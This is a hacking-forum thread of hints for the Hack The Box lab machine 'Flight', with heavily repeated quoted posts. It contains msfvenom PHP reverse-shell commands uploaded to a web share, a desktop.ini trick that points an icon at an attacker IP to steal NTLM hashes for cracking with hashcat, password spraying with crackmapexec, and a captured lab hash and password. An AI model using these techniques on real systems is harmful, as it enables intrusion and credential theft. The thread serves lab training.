Return to forum
Flight - HTB [Discussion]
by - Thursday, January 1, 1970 at 12:00 AM
Member
Member
Posts: 11
Threads: 0
Joined: N/A
Reputation: 0

#51
November 6, 2022 at 1:05 PM
(November 6, 2022, 12:19 PM)hacker9999 Wrote: smbmap -H flight.htb -u S.MOON -p 'S@Ss!K@*t13' --upload desktop.ini Shared\\desktop.ini\\

Any hints on after getting cbum?


try to have revshell from \\Web. I'm trying too

(November 6, 2022, 01:05 PM)casga Wrote:
(November 6, 2022, 12:19 PM)hacker9999 Wrote: smbmap -H flight.htb -u S.MOON -p 'S@Ss!K@*t13' --upload desktop.ini Shared\\desktop.ini\\

Any hints on after getting cbum?


try to have revshell from \\Web. I'm trying too


msfvenom -p php/reverse_php LHOST=10.10.14.X LPORT=9978 -o shell.php
upload on C.Bum \\Web and set an listener on LPORT
Browse school.url.htb/shell.php
Reply
Member
Member
Posts: 45
Threads: 0
Joined: N/A
Reputation: 0

#52
November 6, 2022 at 1:32 PM
(November 6, 2022, 01:05 PM)casga Wrote:
(November 6, 2022, 12:19 PM)hacker9999 Wrote: smbmap -H flight.htb -u S.MOON -p 'S@Ss!K@*t13' --upload desktop.ini Shared\\desktop.ini\\

Any hints on after getting cbum?


try to have revshell from \\Web. I'm trying too

(November 6, 2022, 01:05 PM)casga Wrote:
(November 6, 2022, 12:19 PM)hacker9999 Wrote: smbmap -H flight.htb -u S.MOON -p 'S@Ss!K@*t13' --upload desktop.ini Shared\\desktop.ini\\

Any hints on after getting cbum?


try to have revshell from \\Web. I'm trying too


msfvenom -p php/reverse_php LHOST=10.10.14.X LPORT=9978 -o shell.php
upload on C.Bum \\Web and set an listener on LPORT
Browse school.url.htb/shell.php

work like a charm 😊
Reply
Member
Member
Posts: 21
Threads: 0
Joined: N/A
Reputation: 0

#53
November 6, 2022 at 1:37 PM
am i the only one facing a problem when trying to upload ntlm theft files to the smb client? 
when i do "smbclient -L\\ip -N" it returns SMB1 disabled -- no workgroup available
NB: i changed the protocol to SMB2 since i get (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available when i used SMB1NT_STATUS_RESOURCE_NAME_NOT_FOUND) 
Unable to connect with SMB1 -- no workgroup available NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availableNT_STAT US_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Reply
Member
Member
Posts: 45
Threads: 0
Joined: N/A
Reputation: 0

#54
November 6, 2022 at 1:41 PM
(November 6, 2022, 01:37 PM)kujen5 Wrote: am i the only one facing a problem when trying to upload ntlm theft files to the smb client? 
when i do "smbclient -L\\ip -N" it returns SMB1 disabled -- no workgroup available
NB: i changed the protocol to SMB2 since i get (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available when i used SMB1NT_STATUS_RESOURCE_NAME_NOT_FOUND) 
Unable to connect with SMB1 -- no workgroup available NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availableNT_STAT US_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available


remove -L flag
Reply
Member
Member
Posts: 21
Threads: 0
Joined: N/A
Reputation: 0

#55
November 6, 2022 at 1:42 PM
(November 6, 2022, 01:41 PM)hacker9999 Wrote:
(November 6, 2022, 01:37 PM)kujen5 Wrote: am i the only one facing a problem when trying to upload ntlm theft files to the smb client? 
when i do "smbclient -L\\ip -N" it returns SMB1 disabled -- no workgroup available
NB: i changed the protocol to SMB2 since i get (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available when i used SMB1NT_STATUS_RESOURCE_NAME_NOT_FOUND) 
Unable to connect with SMB1 -- no workgroup available NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availableNT_STAT US_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available


remove -L flag


when i do "smbclient ip -N" it just gives me the help manual of smbclient tool :/
Reply
Member
Member
Posts: 45
Threads: 0
Joined: N/A
Reputation: 0

#56
November 6, 2022 at 1:45 PM
(November 6, 2022, 01:42 PM)kujen5 Wrote:
(November 6, 2022, 01:41 PM)hacker9999 Wrote:
(November 6, 2022, 01:37 PM)kujen5 Wrote: am i the only one facing a problem when trying to upload ntlm theft files to the smb client? 
when i do "smbclient -L\\ip -N" it returns SMB1 disabled -- no workgroup available
NB: i changed the protocol to SMB2 since i get (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available when i used SMB1NT_STATUS_RESOURCE_NAME_NOT_FOUND) 
Unable to connect with SMB1 -- no workgroup available NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availableNT_STAT US_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available


remove -L flag


when i do "smbclient ip -N" it just gives me the help manual of smbclient tool :/


-N is for no-password
You need to provide username and password
Reply
Member
Member
Posts: 21
Threads: 0
Joined: N/A
Reputation: 0

#57
November 6, 2022 at 2:05 PM
I have another question, how do we generate c.bum hash?
i understood the ntlm theft method and the use of responder, but it didnt generate the hash for me, can i get some help

(November 5, 2022, 09:22 PM)may123a Wrote:
(November 5, 2022, 09:19 PM)casga Wrote: 
  2. c.bum::flight.htb:ac16e477bf1e27bf:5816314B415405CF60B2985B50801641:0101000000000000001A20F67BF1D801D9D101F889CEEB0F0000000002000800490057004300420001001E00570049004E002D0041003900450046005300310050004C004D004500430004003400570049004E002D0041003900450046005300310050004C004D00450043002E0049005700430042002E004C004F00430041004C000300140049005700430042002E004C004F00430041004C000500140049005700430042002E004C004F00430041004C0007000800001A20F67BF1D8010600040002000000080030003000000000000000000000000030000096CB9E666F59326C2B7725EFA5810BA50010EA59C75C98E253CC799190C8913D0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00350034000000000000000000

    'S@Ss!K@*t13'
  3. [12:28 PM]

Tikkycoll_431012284 (c.bum)


how did u get the passwd
Reply
Elite User
Elite
Posts: 166
Threads: 0
Joined: N/A
Reputation: 5

#58
November 6, 2022 at 2:46 PM
(November 6, 2022, 02:05 PM)kujen5 Wrote: I have another question, how do we generate c.bum hash?
i understood the ntlm theft method and the use of responder, but it didnt generate the hash for me, can i get some help

(November 5, 2022, 09:22 PM)may123a Wrote:
(November 5, 2022, 09:19 PM)casga Wrote: 
  2. c.bum::flight.htb:ac16e477bf1e27bf:5816314B415405CF60B2985B50801641:0101000000000000001A20F67BF1D801D9D101F889CEEB0F0000000002000800490057004300420001001E00570049004E002D0041003900450046005300310050004C004D004500430004003400570049004E002D0041003900450046005300310050004C004D00450043002E0049005700430042002E004C004F00430041004C000300140049005700430042002E004C004F00430041004C000500140049005700430042002E004C004F00430041004C0007000800001A20F67BF1D8010600040002000000080030003000000000000000000000000030000096CB9E666F59326C2B7725EFA5810BA50010EA59C75C98E253CC799190C8913D0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00350034000000000000000000

    'S@Ss!K@*t13'
  3. [12:28 PM]

Tikkycoll_431012284 (c.bum)


how did u get the passwd

it as already informed here how to get the hash of c.brum:

create a desktop.ini
echo "[.ShellClassInfo]" > desktop.ini
echo IconResource=\\YOUIP\aa >> desktop.ini

upload on \\Shared

smbmap -H flight.htb -u S.MOON -p 'Password' --upload desktop.ini Shared\\desktop.ini\\

responder -I tun0 -v 

after that hashcat -m 5600 hashes.txt rockyou.txt
echo
echo IconResource=\\1.2.3.4\aa >> desktop.ini
Reply
Member
Member
Posts: 21
Threads: 0
Joined: N/A
Reputation: 0

#59
November 6, 2022 at 2:55 PM
(November 6, 2022, 02:46 PM)yumi Wrote:
(November 6, 2022, 02:05 PM)kujen5 Wrote: I have another question, how do we generate c.bum hash?
i understood the ntlm theft method and the use of responder, but it didnt generate the hash for me, can i get some help

(November 5, 2022, 09:22 PM)may123a Wrote:
(November 5, 2022, 09:19 PM)casga Wrote: 
  2. c.bum::flight.htb:ac16e477bf1e27bf:5816314B415405CF60B2985B50801641:0101000000000000001A20F67BF1D801D9D101F889CEEB0F0000000002000800490057004300420001001E00570049004E002D0041003900450046005300310050004C004D004500430004003400570049004E002D0041003900450046005300310050004C004D00450043002E0049005700430042002E004C004F00430041004C000300140049005700430042002E004C004F00430041004C000500140049005700430042002E004C004F00430041004C0007000800001A20F67BF1D8010600040002000000080030003000000000000000000000000030000096CB9E666F59326C2B7725EFA5810BA50010EA59C75C98E253CC799190C8913D0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00350034000000000000000000

    'S@Ss!K@*t13'
  3. [12:28 PM]

Tikkycoll_431012284 (c.bum)


how did u get the passwd

it as already informed here how to get the hash of c.brum:

create a desktop.ini
echo "[.ShellClassInfo]" > desktop.ini
echo IconResource=\\YOUIP\aa >> desktop.ini

upload on \\Shared

smbmap -H flight.htb -u S.MOON -p 'Password' --upload desktop.ini Shared\\desktop.ini\\

responder -I tun0 -v 

after that hashcat -m 5600 hashes.txt rockyou.txt
echo
echo IconResource=\\1.2.3.4\aa >> desktop.ini


actually i was talking also about the S.Moon user password source since i wasnt able to find it
and also i did the steps u just said and responder didnt return anything :/
Reply
Member
Member
Posts: 26
Threads: 0
Joined: N/A
Reputation: 2

#60
November 6, 2022 at 3:13 PM
(November 6, 2022, 02:55 PM)kujen5 Wrote:
(November 6, 2022, 02:46 PM)yumi Wrote:
(November 6, 2022, 02:05 PM)kujen5 Wrote: I have another question, how do we generate c.bum hash?
i understood the ntlm theft method and the use of responder, but it didnt generate the hash for me, can i get some help

(November 5, 2022, 09:22 PM)may123a Wrote:
(November 5, 2022, 09:19 PM)casga Wrote: 
  2. c.bum::flight.htb:ac16e477bf1e27bf:5816314B415405CF60B2985B50801641:0101000000000000001A20F67BF1D801D9D101F889CEEB0F0000000002000800490057004300420001001E00570049004E002D0041003900450046005300310050004C004D004500430004003400570049004E002D0041003900450046005300310050004C004D00450043002E0049005700430042002E004C004F00430041004C000300140049005700430042002E004C004F00430041004C000500140049005700430042002E004C004F00430041004C0007000800001A20F67BF1D8010600040002000000080030003000000000000000000000000030000096CB9E666F59326C2B7725EFA5810BA50010EA59C75C98E253CC799190C8913D0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00350034000000000000000000

    'S@Ss!K@*t13'
  3. [12:28 PM]

Tikkycoll_431012284 (c.bum)


how did u get the passwd

it as already informed here how to get the hash of c.brum:

create a desktop.ini
echo "[.ShellClassInfo]" > desktop.ini
echo IconResource=\\YOUIP\aa >> desktop.ini

upload on \\Shared

smbmap -H flight.htb -u S.MOON -p 'Password' --upload desktop.ini Shared\\desktop.ini\\

responder -I tun0 -v 

after that hashcat -m 5600 hashes.txt rockyou.txt
echo
echo IconResource=\\1.2.3.4\aa >> desktop.ini


actually i was talking also about the S.Moon user password source since i wasnt able to find it
and also i did the steps u just said and responder didnt return anything :/
(November 5, 2022, 11:22 PM)loge23 Wrote: 
crackmapexec smb flight.htb -u svc_apache -p 'S@Ss!K@*t13' --users


save users to file

crackmapexec smb flight.htb -u users.txt -p 'S@Ss!K@*t13' --continue-on-success
Reply


 Users viewing this thread: Flight - HTB [Discussion]: No users currently viewing.